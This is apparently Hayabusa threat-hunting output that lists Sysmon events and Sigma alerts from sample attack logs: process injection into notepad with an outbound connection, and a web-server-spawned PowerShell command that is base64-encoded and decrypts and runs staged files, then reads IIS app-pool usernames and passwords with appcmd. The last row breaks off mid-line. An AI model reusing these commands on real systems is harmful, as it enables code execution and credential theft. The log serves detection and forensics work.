2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlA